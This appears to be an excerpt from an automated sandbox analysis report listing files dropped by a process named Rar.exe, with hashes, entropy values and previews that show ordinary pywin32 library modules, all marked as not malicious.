                                                                                                                                                                                                                                  SHA-256:E298DDCFCB0232257FCAA330844845A4E7807C4E2B5BD938929ED1791CD9D192
                                                                                                                                                                                                                                  SHA-512:24C1AD9CE1D7E7E3486E8111D8049EF1585CAB17B97D29C7A4EB816F7BDF34406AA678F449F8C680B7F8F3F3C8BC164EDAC95CCB15DA654EF9DF86C5BEB199A5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Imported by pywin32.pth to bootstrap the pywin32 environment in "portable".# environments or any other case where the post-install script isn't run..#.# In short, there's a directory installed by pywin32 named 'pywin32_system32'.# with some important DLLs which need to be found by Python when some pywin32.# modules are imported..# If Python has `os.add_dll_directory()`, we need to call it with this path..# Otherwise, we add this path to PATH....try:. import pywin32_system32.except ImportError: # Python .3.6: replace ImportError with ModuleNotFoundError. pass.else:. import os.. # We're guaranteed only that __path__: Iterable[str]. # https://docs.python.org/3/reference/import.html#__path__. for path in pywin32_system32.__path__:. if os.path.isdir(path):. if hasattr(os, "add_dll_directory"):. os.add_dll_directory(path). # This is to ensure the pywin32 path is in the beginning to find the. # pywin32 DLLs first an
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11552
                                                                                                                                                                                                                                  Entropy (8bit):4.499300065894434
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:62xH/42BdXjaMMhqH0eRhAcjWKTR7AXTv3Hm5z:66H62H0khAOXV0XTvm5z
                                                                                                                                                                                                                                  MD5:9C5202F60D6DA913C7CAF90DC9373281
                                                                                                                                                                                                                                  SHA1:9F961266AE675DDF9C5FF9AB5047C9D7ECEAAF6A
                                                                                                                                                                                                                                  SHA-256:79AB4108C89ACA419476CE9B96F32966800A3FC159812C10B1AE1E3E67DF2FB5
                                                                                                                                                                                                                                  SHA-512:6D3C07C23A2DCF7838B8D2B2D545598C5B5EADC62370571C824EDB6CA0A2B31222E1E713B5FBBDFA8F86ACF8161D2C134CDA4A1442FB44BD7BBA240FD55F0DC1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Utilities for the pywin32 tests.import gc.import os.import site.import sys.import unittest..import winerror..##.## General purpose utilities for the test suite..##...# The test suite has lots of string constants containing binary data, but.# the strings are used in various "bytes" contexts..def str2bytes(sval):. if sys.version_info < (3, 0) and isinstance(sval, str):. sval = sval.decode("latin1"). return sval.encode("latin1")...# Sometimes we want to pass a string that should explicitly be treated as.# a memory blob..def str2memory(sval):. if sys.version_info < (3, 0):. return buffer(sval). # py3k.. return memoryview(sval.encode("latin1"))...# Sometimes we want to pass an object that exposes its memory.def ob2memory(ob):. if sys.version_info < (3, 0):. return buffer(ob). # py3k.. return memoryview(ob)...##.## unittest related stuff.##...# This is a specialized TestCase adaptor which wraps a real test..class LeakTestCase(unittest.TestCase):
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:magic text file for file(1) cmd, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5938
                                                                                                                                                                                                                                  Entropy (8bit):4.44618870200388
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:QWrCPU5+9J3RONAy1jeBPAVkJzjAhF2hAbXxM/ADIWaDyRkI+oiCG/Ym:Q/PU5OQD04VkZEh1OI8FyFApYm
                                                                                                                                                                                                                                  MD5:B4FB724E0920809325DC40BC7E7C2813
                                                                                                                                                                                                                                  SHA1:3C5F3D8966E28C14757B64E5E4BE521DCAFC51F9
                                                                                                                                                                                                                                  SHA-256:298DCE6680D5005FE34240C6AAC3547D98FEFC33A0C4DB5E9F0A32C284ED09B4
                                                                                                                                                                                                                                  SHA-512:5D03A2D921FD49667D88A0D99D457B74F863B6F4F8FBB3620030EB44CDAEAEFCD82F7DABFA5E634A29528ABCB17D4E125868CC52835A3CE0BFC67A1770AC38FA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Magic utility that "redirects" to pywintypesxx.dll.import importlib.machinery.import importlib.util.import os.import sys...def __import_pywin32_system_module__(modname, globs):. # This has been through a number of iterations. The problem: how to. # locate pywintypesXX.dll when it may be in a number of places, and how. # to avoid ever loading it twice. This problem is compounded by the. # fact that the "right" way to do this requires win32api, but this. # itself requires pywintypesXX.. # And the killer problem is that someone may have done 'import win32api'. # before this code is called. In that case Windows will have already. # loaded pywintypesXX as part of loading win32api - but by the time. # we get here, we may locate a different one. This appears to work, but. # then starts raising bizarre TypeErrors complaining that something. # is not a pywintypes type when it clearly is!.. # So in what we hope is the last major iteration of this, we now
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1724
                                                                                                                                                                                                                                  Entropy (8bit):4.998195255193026
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:75h575T5L0y5T5Z5HZ5r5R5dL5/5X5OI5cy5X5h5+HkJ5EO5g0587O5D5/5575ch:7b1dh1TLVjf5pB9xLgHkJyO+067OtbFW
                                                                                                                                                                                                                                  MD5:5DEDB350BE4D6433395E5A20DD87CCD9
                                                                                                                                                                                                                                  SHA1:3B0C06BEB7F09AAFD16D9B76266C1D942A1AEA56
                                                                                                                                                                                                                                  SHA-256:163BA151CB3D18957BDFC6FCECD5B733F679BCCD6F7E70A902E9327AE0152546
                                                                                                                                                                                                                                  SHA-512:F43F5E3436E00447808737D1A2EF3BBD1817FD9F53066707552154A9747BC3B77861C4EDB9E398D15B46E4B946F8B62E7392D28BE3F0199C12AA2E188055987A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import win32ras..stateStrings = {. win32ras.RASCS_OpenPort: "OpenPort",. win32ras.RASCS_PortOpened: "PortOpened",. win32ras.RASCS_ConnectDevice: "ConnectDevice",. win32ras.RASCS_DeviceConnected: "DeviceConnected",. win32ras.RASCS_AllDevicesConnected: "AllDevicesConnected",. win32ras.RASCS_Authenticate: "Authenticate",. win32ras.RASCS_AuthNotify: "AuthNotify",. win32ras.RASCS_AuthRetry: "AuthRetry",. win32ras.RASCS_AuthCallback: "AuthCallback",. win32ras.RASCS_AuthChangePassword: "AuthChangePassword",. win32ras.RASCS_AuthProject: "AuthProject",. win32ras.RASCS_AuthLinkSpeed: "AuthLinkSpeed",. win32ras.RASCS_AuthAck: "AuthAck",. win32ras.RASCS_ReAuthenticate: "ReAuthenticate",. win32ras.RASCS_Authenticated: "Authenticated",. win32ras.RASCS_PrepareForCallback: "PrepareForCallback",. win32ras.RASCS_WaitForModemReset: "WaitForModemReset",. win32ras.RASCS_WaitForCallback: "WaitForCallback",. win32ras.RASCS_Projected: "Projected",. w
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4484
                                                                                                                                                                                                                                  Entropy (8bit):4.387225499230269
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:CDAgwu0aLSqlU0HNrIvqtHR4jUa6wRyC6jSJU9zyoMuMw2mS2Sr33bD8:QAHwq0Sgx4zHPlr33bD8
                                                                                                                                                                                                                                  MD5:CFA098F4BF2CBC4604EA85902A1FA94A
                                                                                                                                                                                                                                  SHA1:C84C5E01878ED40FC2BC8EA6EE7065EB9D8694F8
                                                                                                                                                                                                                                  SHA-256:4513AC3EB7FEE4A80B0D285FA881B94CD1490C17C7C293349976EB7FC0BB5EF3
                                                                                                                                                                                                                                  SHA-512:8FEAF8C8A4A93E64ACBAF22431CAA77D74F17E53D317665E593CCF9265C513B798A95B28FF7ED2272C6C5CF568A199C5DCB4897BD40159E70C64DDC792CF540B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This module is very old and useless in this day and age! It will be.# removed in a few years (ie, 2009 or so...)..import warnings..warnings.warn(. "The regcheck module has been pending deprecation since build 210",. category=PendingDeprecationWarning,.)..import os.import sys..import regutil.import win32api.import win32con...def CheckRegisteredExe(exename):. try:. os.stat(. win32api.RegQueryValue(. regutil.GetRootKey(), regutil.GetAppPathsKey() + "\\" + exename. ). ). # .except SystemError:. except (os.error, win32api.error):. print("Registration of %s - Not registered correctly" % exename)...def CheckPathString(pathString):. for path in pathString.split(";"):. if not os.path.isdir(path):. return "'%s' is not a valid directory!" % path. return None...def CheckPythonPaths(verbose):. if verbose:. print("Python Paths:"). # Check the core path. if verbose:. print("\tCor
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12341
                                                                                                                                                                                                                                  Entropy (8bit):4.867163934678907
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:s0Nxfa7aaG6JxIJ/Erq2K5I0OwWhwA4ob67joc2klFaD4rYtbl:s0NxCmaG6JxIJ/Er25I0OwWhwA4ob67g
                                                                                                                                                                                                                                  MD5:2526CDC3EE6341EC163D8C4A1682279C
                                                                                                                                                                                                                                  SHA1:9C59136C2F1510EDCF495F951A32A0EEA63C6275
                                                                                                                                                                                                                                  SHA-256:0E4EC545FA05064142368E6501152DC290520675343149F299BBE994D6C5B65D
                                                                                                                                                                                                                                  SHA-512:7A26252FEC5FB54A89C10AD26EABFD7BECFF1FB7F9336157E3657497C16D000011DD981C5DAE2A086DCD96FE99A4FA46CD908BCA07645D247800643BAEE7D796
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Some registry helpers..import os.import sys..import win32api.import win32con..error = "Registry utility error"..# A .py file has a CLSID associated with it (why? - dunno!).CLSIDPyFile = "{b51df050-06ae-11cf-ad3b-524153480001}"..RegistryIDPyFile = "Python.File" # The registry "file type" of a .py file.RegistryIDPycFile = "Python.CompiledFile" # The registry "file type" of a .pyc file...def BuildDefaultPythonKey():. """Builds a string containing the path to the current registry key... The Python registry key contains the Python version. This function. uses the version of the DLL used by the current process to get the. registry key currently in use.. """. return "Software\\Python\\PythonCore\\" + sys.winver...def GetRootKey():. """Retrieves the Registry root in use by Python.""". keyname = BuildDefaultPythonKey(). try:. k = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyname). k.close(). return win32con.HKEY_CURRENT_USER. except
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15590
                                                                                                                                                                                                                                  Entropy (8bit):4.735360635701188
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:8EYAX708RP3gd3dP3gsfHhS3R3tFoS3Ry1OHg2TDEG9m4p2IuEIYE0x8GwOyrtPI:oALGJHuFkOv6G5zlXszHPnqj
                                                                                                                                                                                                                                  MD5:03D230AD5621621A0B38C15DB6B56DD0
                                                                                                                                                                                                                                  SHA1:D88B7924743BC73412ED75C2209BDC71CD0D3792
                                                                                                                                                                                                                                  SHA-256:9E9BDAB113FA4909689D17E8888090460684290E4F2D1F7C19897546C6AEDB00
                                                                                                                                                                                                                                  SHA-512:13B3D3478F1CCF0B746059B6E62E3A4B8FA069CB25C9A2C3F57AAF90033066B32034F6DB204143717D986972ED261E627B4C03D26EBEC311636A5B1249E4B419
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""".Helper classes for SSPI authentication via the win32security module...SSPI authentication involves a token-exchange "dance", the exact details.of which depends on the authentication provider used. There are also.a number of complex flags and constants that need to be used - in most.cases, there are reasonable defaults...These classes attempt to hide these details from you until you really need.to know. They are not designed to handle all cases, just the common ones..If you need finer control than offered here, just use the win32security.functions directly..""".# Based on Roger Upole's sspi demos..# $Id$.import sspicon.import win32security..error = win32security.error...class _BaseAuth(object):. def __init__(self):. self.reset().. def reset(self):. """Reset everything to an unauthorized state""". self.ctxt = None. self.authenticated = False. self.initiator_name = None. self.service_name = None.. # The next seq_num for an encry
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15697
                                                                                                                                                                                                                                  Entropy (8bit):5.075827160638741
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:OcR7K/jSxpilZaMpRwnrvrzRIfPKCl60J0:OclaVwnrvrzfClrC
                                                                                                                                                                                                                                  MD5:9453DC2AD38FC69224C077BD945110D7
                                                                                                                                                                                                                                  SHA1:10D2438CA799BDDB8C59218EA12A1E68A321B66D
                                                                                                                                                                                                                                  SHA-256:403A89B99178441B8769DE753EF98447F73598F52E30701C81A37E4477B340E0
                                                                                                                                                                                                                                  SHA-512:70071F01B293949ACFA09C7909005363D5832A66FF9A1B43EA00B55A517CE6E2D566FC3B6068A932E19E0355EDA339427CE7BCD7A53568F19FBBEB19AE4C7475
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Generated by h2py from c:\microsoft sdk\include\sspi.h.ISSP_LEVEL = 32.ISSP_MODE = 1...def SEC_SUCCESS(Status):. return (Status) >= 0...SECPKG_FLAG_INTEGRITY = 1.SECPKG_FLAG_PRIVACY = 2.SECPKG_FLAG_TOKEN_ONLY = 4.SECPKG_FLAG_DATAGRAM = 8.SECPKG_FLAG_CONNECTION = 16.SECPKG_FLAG_MULTI_REQUIRED = 32.SECPKG_FLAG_CLIENT_ONLY = 64.SECPKG_FLAG_EXTENDED_ERROR = 128.SECPKG_FLAG_IMPERSONATION = 256.SECPKG_FLAG_ACCEPT_WIN32_NAME = 512.SECPKG_FLAG_STREAM = 1024.SECPKG_FLAG_NEGOTIABLE = 2048.SECPKG_FLAG_GSS_COMPATIBLE = 4096.SECPKG_FLAG_LOGON = 8192.SECPKG_FLAG_ASCII_BUFFERS = 16384.SECPKG_FLAG_FRAGMENT = 32768.SECPKG_FLAG_MUTUAL_AUTH = 65536.SECPKG_FLAG_DELEGATION = 131072.SECPKG_FLAG_READONLY_WITH_CHECKSUM = 262144.SECPKG_ID_NONE = 65535..SECBUFFER_VERSION = 0.SECBUFFER_EMPTY = 0.SECBUFFER_DATA = 1.SECBUFFER_TOKEN = 2.SECBUFFER_PKG_PARAMS = 3.SECBUFFER_MISSING = 4.SECBUFFER_EXTRA = 5.SECBUFFER_STREAM_TRAILER = 6.SECBUFFER_STREAM_HEADER = 7.SECBUFFER_NEGOTIATION_INFO = 8.SECBUFFER_PADDING = 9
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):334
                                                                                                                                                                                                                                  Entropy (8bit):4.571035255295966
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:SD4cBz3TqzKdD6Le/VieikwcBTAZ7XGap/892EtQCR6Uh286AI/kJln:A4cBeur/I8TBclvW2+sWl0kJl
                                                                                                                                                                                                                                  MD5:ABBC2A410CB902383B0DCC308BE715F3
                                                                                                                                                                                                                                  SHA1:9E177FF30F49DB4F20145671B5C9F88B278D3C3E
                                                                                                                                                                                                                                  SHA-256:F0467A1CA6FFC066C7ED283CDAE5D2EA76AEFE5B9CC21C3FE096B5D28C23765A
                                                                                                                                                                                                                                  SHA-512:3F5E10EF7C44FE6EF61ECD1CFB0FED21F5D9448C98291485917E0491F4F6EC904131894CA4D8E2425F08FA2FC18210CA4FB32191E8AB3336A9223A6DFB6AC5D9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# win2kras used to be an extension module with wrapped the "new" RAS functions.# in Windows 2000, so win32ras could still be used on NT/etc..# I think in 2021 we can be confident pywin32 is not used on earlier OSs, so.# that functionality is now in win32ras..#.# This exists just to avoid breaking old scripts..from win32ras import *.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):117047
                                                                                                                                                                                                                                  Entropy (8bit):5.102756787103929
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:aYLzODfYiXGYvTVkcgURPpp0kcNXj3s1VrzieuVoIOSGrv+I23pwkeJyUYziNubq:BjVOmcgUbpSJjI1GeuDGv+rINubI2s
                                                                                                                                                                                                                                  MD5:6D9449506328201C05E643B0D4E65EA1
                                                                                                                                                                                                                                  SHA1:D1F20BB6928C5A6B4DE0EF48CC380D113C61AA90
                                                                                                                                                                                                                                  SHA-256:7DB98CEDA5CD93A5954A5434BD0D77A34825EC772400ED67037A8C87838BDDC7
                                                                                                                                                                                                                                  SHA-512:0209E9D59EFE0B2890CC5BBCEB1B447F408CA4BC84313B8E8A8C1B9235761A4EF15C5E737B626B1AE81D6CD4A39F194682227E415F30D664F15B5FCC06B28449
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Generated by h2py from commdlg.h (plus modifications 4jan98).WINVER = 1280.WM_USER = 1024.PY_0U = 0.OFN_READONLY = 1.OFN_OVERWRITEPROMPT = 2.OFN_HIDEREADONLY = 4.OFN_NOCHANGEDIR = 8.OFN_SHOWHELP = 16.OFN_ENABLEHOOK = 32.OFN_ENABLETEMPLATE = 64.OFN_ENABLETEMPLATEHANDLE = 128.OFN_NOVALIDATE = 256.OFN_ALLOWMULTISELECT = 512.OFN_EXTENSIONDIFFERENT = 1024.OFN_PATHMUSTEXIST = 2048.OFN_FILEMUSTEXIST = 4096.OFN_CREATEPROMPT = 8192.OFN_SHAREAWARE = 16384.OFN_NOREADONLYRETURN = 32768.OFN_NOTESTFILECREATE = 65536.OFN_NONETWORKBUTTON = 131072.OFN_NOLONGNAMES = 262144.OFN_EXPLORER = 524288 # new look commdlg.OFN_NODEREFERENCELINKS = 1048576.OFN_LONGNAMES = 2097152 # force long names for 3.x modules.OFN_ENABLEINCLUDENOTIFY = 4194304 # send include message to callback.OFN_ENABLESIZING = 8388608.OFN_DONTADDTORECENT = 33554432.OFN_FORCESHOWHIDDEN = 268435456 # Show All files including System and hidden files.OFN_EX_NOPLACESBAR = 1.OFN_SHAREFALLTHROUGH = 2.OFN_SHARENOWARN = 1.OFN_SHAREWARN = 0.CDN
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):72494
                                                                                                                                                                                                                                  Entropy (8bit):5.132765035748773
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:GUR6nCUZch1pYy64OZWA+PrZ6rBn3CDx5vF9hNJx4GIGZKngFLf0nLVNaRB56oBp:/3YqDMrBn3Ctv4A
                                                                                                                                                                                                                                  MD5:DCC36C5E07BA223144EDC9DA143C5631
                                                                                                                                                                                                                                  SHA1:06CA43F7B6F208F32E1B9A7F0D97785A65FE333C
                                                                                                                                                                                                                                  SHA-256:4E3B2ACAE1B0ACE6DBAFB5ADE99048879F75275423063247BE25FE4749D23EAD
                                                                                                                                                                                                                                  SHA-512:CBEBE171A15DA44AF86F8EA2CBED90B5614928EA1136EB34030AAADBA2A399C36445FFACD8B3CF6A8A2CB41E923C26330303F0E29F1D4BF431562E3C89559C70
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Generated by h2py from WinCrypt.h.def GET_ALG_CLASS(x):. return x & (7 << 13)...def GET_ALG_TYPE(x):. return x & (15 << 9)...def GET_ALG_SID(x):. return x & (511)...ALG_CLASS_ANY = 0.ALG_CLASS_SIGNATURE = 1 << 13.ALG_CLASS_MSG_ENCRYPT = 2 << 13.ALG_CLASS_DATA_ENCRYPT = 3 << 13.ALG_CLASS_HASH = 4 << 13.ALG_CLASS_KEY_EXCHANGE = 5 << 13.ALG_CLASS_ALL = 7 << 13.ALG_TYPE_ANY = 0.ALG_TYPE_DSS = 1 << 9.ALG_TYPE_RSA = 2 << 9.ALG_TYPE_BLOCK = 3 << 9.ALG_TYPE_STREAM = 4 << 9.ALG_TYPE_DH = 5 << 9.ALG_TYPE_SECURECHANNEL = 6 << 9.ALG_SID_ANY = 0.ALG_SID_RSA_ANY = 0.ALG_SID_RSA_PKCS = 1.ALG_SID_RSA_MSATWORK = 2.ALG_SID_RSA_ENTRUST = 3.ALG_SID_RSA_PGP = 4.ALG_SID_DSS_ANY = 0.ALG_SID_DSS_PKCS = 1.ALG_SID_DSS_DMS = 2.ALG_SID_DES = 1.ALG_SID_3DES = 3.ALG_SID_DESX = 4.ALG_SID_IDEA = 5.ALG_SID_CAST = 6.ALG_SID_SAFERSK64 = 7.ALG_SID_SAFERSK128 = 8.ALG_SID_3DES_112 = 9.ALG_SID_CYLINK_MEK = 12.ALG_SID_RC5 = 13.ALG_SID_AES_128 = 14.ALG_SID_AES_192 = 15.ALG_SID_AES_256 = 16.ALG_SID_AES = 17.ALG_SID_
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7612
                                                                                                                                                                                                                                  Entropy (8bit):4.617430807608831
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:xjfuaURPBUS3onZz6vxVjomyWdLKHUoUNeSm/oGLoFXkPa1mPeeSm6C:xjARPqS3onZz6JVjomLdeHZUYP3Loa+u
                                                                                                                                                                                                                                  MD5:4056059DA5B13E78304894A5DEC5A3EF
                                                                                                                                                                                                                                  SHA1:7223224E6D80F2265E531976843061A344D0202A
                                                                                                                                                                                                                                  SHA-256:92803137353DA3AB0554FF8980F532BDFD994718E0C76BBEBE1DDA72772ACFCC
                                                                                                                                                                                                                                  SHA-512:1148427CDC915EAD9F942A0DCFCFE47BFF784110630CEB202E9F43C0A787282FF926A434D1229C8837B847A4E604DF6A7F09708B1D28C1248889453AD28D8781
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Event Log Utilities - helper for win32evtlog.pyd."""..import win32api.import win32con.import win32evtlog.import winerror..error = win32api.error # The error the evtlog module raises...langid = win32api.MAKELANGID(win32con.LANG_NEUTRAL, win32con.SUBLANG_NEUTRAL)...def AddSourceToRegistry(. appName,. msgDLL=None,. eventLogType="Application",. eventLogFlags=None,. categoryDLL=None,. categoryCount=0,.):. """Add a source of messages to the event log... Allows Python program to register a custom source of messages in the. registry. You must also provide the DLL name that has the message table, so the. full message text appears in the event log... Note that the win32evtlog.pyd file has a number of string entries with just "%1". built in, so many Python programs can simply use this DLL. Disadvantages are that. you do not get language translation, and the full text is stored in the event log,. blowing the size of the log up.. """.. # When an
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30127
                                                                                                                                                                                                                                  Entropy (8bit):4.825689367996127
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:bECgvkVU6pyZ3N9UmZxqoMUHyMSrU4AGvoDwOSdV9aaZDgKh:bEdAwZ375Zux6mdIKh
                                                                                                                                                                                                                                  MD5:B07124FDD02BB98B79FA59067C88927E
                                                                                                                                                                                                                                  SHA1:7AE2C2F6EFE5CE004C10B993F2DEAD988DDAED9A
                                                                                                                                                                                                                                  SHA-256:EBE1F5BC059EA1B530E701EA649EF8644E09785B72AB1866DF6977C8C0D7A1B4
                                                                                                                                                                                                                                  SHA-512:9798EE222E0E5D98DAFDB4A103C91D6B0AB98D6BE75EBA9B945FD663E9FC0036AB6C3F62630ACED21B168C548D1DDDD3DBA024B4302DB8B97891F450C19B0CBA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This is a work in progress - see Demos/win32gui_menu.py..# win32gui_struct.py - helpers for working with various win32gui structures..# As win32gui is "light-weight", it does not define objects for all possible.# win32 structures - in general, "buffer" objects are passed around - it is.# the callers responsibility to pack the buffer in the correct format..#.# This module defines some helpers for the commonly used structures..#.# In general, each structure has 3 functions:.#.# buffer, extras = PackSTRUCTURE(items, ...).# item, ... = UnpackSTRUCTURE(buffer).# buffer, extras = EmtpySTRUCTURE(...).#.# 'extras' is always items that must be held along with the buffer, as the.# buffer refers to these object's memory..# For structures that support a 'mask', this mask is hidden from the user - if.# 'None' is passed, the mask flag will not be set, or on return, None will.# be returned for the value if the mask is not set..#.# NOTE: I considered making these structures look like real classes, a
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):43217
                                                                                                                                                                                                                                  Entropy (8bit):4.6681753612382915
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:yQbVsdBQqM8dX/A8G3gu0CIHq4Wo5MGJ0hii1/dK2iy0rM:yQbqtX/A8Gwu0CIHq4Wo5MGJ0H0rM
                                                                                                                                                                                                                                  MD5:3E80C82D1405D405BE8010FA6040C732
                                                                                                                                                                                                                                  SHA1:F34649F7F1998CC0E88D73615DC97D3ED8B26EFA
                                                                                                                                                                                                                                  SHA-256:141EE8BBE50251222119936B059936FCA0108A8F53F25D8C8D76172A73DB688F
                                                                                                                                                                                                                                  SHA-512:7994A0F197AD1B6308B34AAACAAB612D24B89A5CA50D0E9B9043F5DB8C07C29BFA1D85735AEA573B8879C8F99C286B328DA277AFE590EB5539994FA9B0BA101B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Generated by h2py from \mssdk\include\WinInet.h..INTERNET_INVALID_PORT_NUMBER = 0.INTERNET_DEFAULT_PORT = 0.INTERNET_DEFAULT_FTP_PORT = 21.INTERNET_DEFAULT_GOPHER_PORT = 70.INTERNET_DEFAULT_HTTP_PORT = 80.INTERNET_DEFAULT_HTTPS_PORT = 443.INTERNET_DEFAULT_SOCKS_PORT = 1080.INTERNET_MAX_HOST_NAME_LENGTH = 256.INTERNET_MAX_USER_NAME_LENGTH = 128.INTERNET_MAX_PASSWORD_LENGTH = 128.INTERNET_MAX_PORT_NUMBER_LENGTH = 5.INTERNET_MAX_PORT_NUMBER_VALUE = 65535.INTERNET_MAX_PATH_LENGTH = 2048.INTERNET_MAX_SCHEME_LENGTH = 32.INTERNET_KEEP_ALIVE_ENABLED = 1.INTERNET_KEEP_ALIVE_DISABLED = 0.INTERNET_REQFLAG_FROM_CACHE = 0x00000001.INTERNET_REQFLAG_ASYNC = 0x00000002.INTERNET_REQFLAG_VIA_PROXY = 0x00000004.INTERNET_REQFLAG_NO_HEADERS = 0x00000008.INTERNET_REQFLAG_PASSIVE = 0x00000010.INTERNET_REQFLAG_CACHE_WRITE_DISABLED = 0x00000040.INTERNET_REQFLAG_NET_TIMEOUT = 0x00000080.INTERNET_FLAG_RELOAD = -2147483648.INTERNET_FLAG_RAW_DATA = 0x40000000.INTERNET_FLAG_EXISTING_CONNECT = 0x20000000.INTERNET_
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18532
                                                                                                                                                                                                                                  Entropy (8bit):4.901387880502849
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:XFerFC+a4nQVCUc66U5ICst7fPbeK/EZzQ8SLT9Bc7rzrLTgH4k0:ccCUc66U5ICstT/EpZ7v3L
                                                                                                                                                                                                                                  MD5:270657C418E28DF9E73D1696C20FA02D
                                                                                                                                                                                                                                  SHA1:3CF6B740CEF32D322F474FC2F0CF2B90031531B2
                                                                                                                                                                                                                                  SHA-256:7DC59BBF74413E8951D199A9DE1B7DDAFE027FB1244C813F2DBD3DF3841AE80E
                                                                                                                                                                                                                                  SHA-512:2AA93F6E05ABBA165CFD7F72E8ADC5DC0C7FFD7FD3C5AC8F762E5D6C2F40FA619469A9757185163208B7594869FC7D2755026D8AECE5AFCBB6BAD4F4C1A746E0
                                                                                                                                                                                                                                  Malicious:false
